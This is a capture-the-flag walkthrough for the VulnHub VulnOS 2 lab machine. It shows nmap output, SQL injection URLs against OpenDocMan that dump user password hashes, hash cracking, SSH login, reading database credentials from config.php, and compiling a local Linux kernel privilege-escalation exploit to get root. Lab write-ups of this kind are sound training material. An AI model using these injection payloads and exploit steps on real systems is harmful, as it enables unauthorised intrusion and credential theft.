Vulnhub VulnOS 2 walkthrough| sql injection in url

VulnOS: 2 is a boot to root virtual machine which is hosted on Vulnhub.

root@kali:~#nmap -p- 10.0.0.127

Nmap scan report for 10.0.0.127
Host is up (0.00015s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6667/tcp open irc
MAC Address: 08:00:27:AD:6B:C2 (Oracle VirtualBox virtual NIC)

Identify services and version running on VulnOS

root@kali:~/Documents/vulnhub/vulnOS#nmap -sVC -vv -p- 10.0.0.127
Nmap scan report for 10.0.0.127
Host is up, received arp-response (0.00022s latency).
Scanned at 2020–01–15 21:54:19 IST for 20s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAORRAsDcJJtkwMruX4yXojqiox8ni/JHNX/zgwtmPcfLkENKY5bYD1dMpASvE0K9Gh5Mo4U/yycRK9xHGLMssBBr5F8QOq8I66Ee7kOG+CJzT+g5Fhl+0R5pI2+kEGSipf+mL1A1HA9JYm87rNWkG3mI5cS4J2okX2CMZGPYucflAAAAFQCdR4coK0rgndw4wMd7SCCewTd5QQAAAIBGnb2CKZQhnmy7G/Dublt921HOMTOb3jXJugIp/Q0g9sQEkYQoEEXOS5+kDVODt7C1rgZQzvY4eX2gnEcW38esIIYVX5j54bV7RpcYTs+3onSvpLJJJudFOF8jS/J53DeiQ9sS68bCDi1K7h7f5dLeaemKJz8j42/8mdUpEZ+xHAAAAIBXyrkDziSMSuaCSxkfwFMzlqFWNI5EszgByhcHsuNYhrRryrZkC/Jq7ypWv2vt1zlkem9z/l5eX7gxwhckbQgPHqKxtmfznzoosQ0EoHAnG+bO7VXDM1yFl5xCXBLFvFlE6QjYJBcrtz9jeAJHUlyXAYIrSthz6y4OCc0rGAxC+g==
| 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDpuBQNKY6U8FF+8yJgjCqn0f9MJ1rCgGLo2HdvhWvbgyOxmvf4mg47Oi4OWjpD7oiiaawPLFJfUPhBl7CVLLnMQxM6MDdmJP1qSl6slA52KB9Qt8hvPiatY9yF2UzTQ+riP9g2n6D9QQruSVQQFsKUeJvte2X7EApMmmXSQ1L/Qziio1mFu4tvqckMsfdjlYnFSRSdKoorT/7/Vw0sBUzDNsSsGq8tA3rqGOKmj3JdS0H0FGEciLFyIx9/rLC2bHc03l2V08Y8MozB3TQTcO6lvxpFgSAEPmNglCAMSZOIFmdIvpmi5FfHsVuP6O94twetVHq0CyvihY8SoXQoiqib
| 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMTthIC3/w1NQVyFFPrMh63/cVUWJylryc7v9Whbab9DKivYIWxffvI6HJpjeMm63ChJV9HjkbtGBbKhnNeRJ64=
| 256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMx/VEravl9aUxne0KuM0Eexc8iu9sMLlyKfDQJ7XIn4
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open irc syn-ack ttl 64 ngircd
MAC Address: 08:00:27:AD:6B:C2 (Oracle VirtualBox virtual NIC)
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 15 21:54:39 2020–1 IP address (1 host up) scanned in 21.16 seconds

Port 80 — Enumerating http Apache httpd 2.4.7 ((Ubuntu))

open 10.0.0.127 in web browser

Lets follow along the hyperlink on the page. We are presented with another website.

The documentation tab gives away some information about a new site and its credentials.

click on home

then see in url something like http://10.0.0.127/jabc/?q=node/1 normally change value 1,2,3,4,5,6,7 and http://10.0.0.127/jabc/?q=node/7 when change value 1 to 7

then open documantation and in screen show none then open source code like something

<p><span style="color:#000000">For security reasons, this section is hidden.</span></p>
<p><span style="color:#000000">For a detailed view and documentation of our products, please visit our documentation platform at on the server. Just login with guest/guest</span></p>
<p><span style="color:#000000">Thank you.</span></p>

and found new directory /jabcd0cs/

open 10.0.0.127/jabcd0cs/

and see a login page i’m login with guest/guest and uploading php reverse shell but not upload

then logut from guest

and now im trying sql injection in login page

the found an error

and now i’m searching OpenDocMan v1.2.7 exploit

The exploit states that odm_user parameter is vulnerable to SQL injection.

then in url

http://10.0.0.127/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9 from information_schema.columns

the enumerate username and password from odm_user

http://10.0.0.127/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,concat(username,0x3a,password),3,4,5,6,7,8,9%20from%20odm_user

webmin:b78aae356709f8c31118ea613980954b
guest:084e0343a0486ff05530df6c705c8bb4

then crack the hash use crackstation

webmin:b78aae356709f8c31118ea613980954b:webmin1980
guest:084e0343a0486ff05530df6c705c8bb4:guest

and login with ssh using user webmin and password webmin1980

and now got the shell convert proper shell using command

webmin@VulnOSv2:~$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)

Privilege Escalation

and search opendocman directory structure and where oopendocman store config files

after some enumeration we found config.php

webmin@VulnOSv2:/var/www/html/jabcd0cs$ cat config.php

and found mysql user root passwd toor

and try mysql root password as system root password then authentication failure

webmin@VulnOSv2:/var/www/html/jabcd0cs$ su root
Password:
su: Authentication failure
webmin@VulnOSv2:/var/www/html/jabcd0cs$

then try sudo -l

webmin@VulnOSv2:/var/www/html/jabcd0cs$ sudo -l
[sudo] password for webmin:
Sorry, user webmin may not run sudo on VulnOSv2.
webmin@VulnOSv2:/var/www/html/jabcd0cs$

then try

webmin@VulnOSv2:/var/www/html/jabcd0cs$ uname -a
Linux VulnOSv2 3.13.0–24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux

and searchexploit 2 3.13.0–24-generic #47-Ubuntu

root@kali:~/Documents/vulnhub/vulnOS# searchsploit ubuntu

Linux Kernel 2.13.0 < 3.19 (Ubun | exploits/linux/local/37292.c

compile exploit using gcc

webmin@VulnOSv2:/tmp$ gcc 37292.c -o ofs

and run exploit

webmin@VulnOSv2:/tmp$ ls
37292.c ofs vulnoskernal
webmin@VulnOSv2:/tmp$ ./ofs

webmin@VulnOSv2:/tmp$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)

then

# cd /root
# ls
flag.txt

# cat flag.txt
Hello and welcome.
You successfully compromised the company “JABC” and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

enjoy your hacking